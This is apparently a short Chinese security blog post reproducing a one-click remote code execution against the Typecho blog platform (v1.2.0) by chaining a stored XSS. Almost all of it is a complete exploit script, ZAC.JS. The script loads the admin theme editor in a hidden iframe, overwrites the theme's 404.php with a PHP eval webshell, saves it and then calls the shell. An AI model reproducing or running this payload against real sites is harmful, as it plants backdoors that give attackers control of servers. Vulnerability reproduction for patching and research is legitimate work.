Typecho(最新1clickRCE复现) |

typecho(1clickRCE复现)

ZAC安全

#2023#

今天看到typecho公开了一个xss，今天简单复现一下顺便说一下rce，还是经典的1click，懂的师傅可以直接关闭本文去复现了。本文感谢火炬师傅的大力支持！

本人用的环境是最新的releases，v1.2.0，以下的版本应该也都受影响

Typecho(最新1clickRCE复现)

然后准备好ZAC.JS文件，作为exp

function step1(){    var data2="<iframe id="testxss" src="http://localhost/admin/theme-editor.php?theme=default&file=404.php" width="0%" height="0%" onload="poc()"></iframe>";    var oldata=document.body.innerHTML;    document.body.innerHTML=(oldata+data2);}var times=0;var g_shell=0;function poc(){    if(times<=10){        var htmldata=document.getElementById('testxss').contentWindow.document.getElementById('content');        var btn=document.getElementById('testxss').contentWindow.document.getElementsByTagName('button');        htmldata.innerText=('<?php eval($_POST[1]);');        btn[1].click();        times+=1;        if(g_shell==1){            var xhr1=new XMLHttpRequest();            xhr1.open('get','/usr/themes/default/404.php?shell=1');            xhr1.send();            }        else{            return 0;        }    }}step1();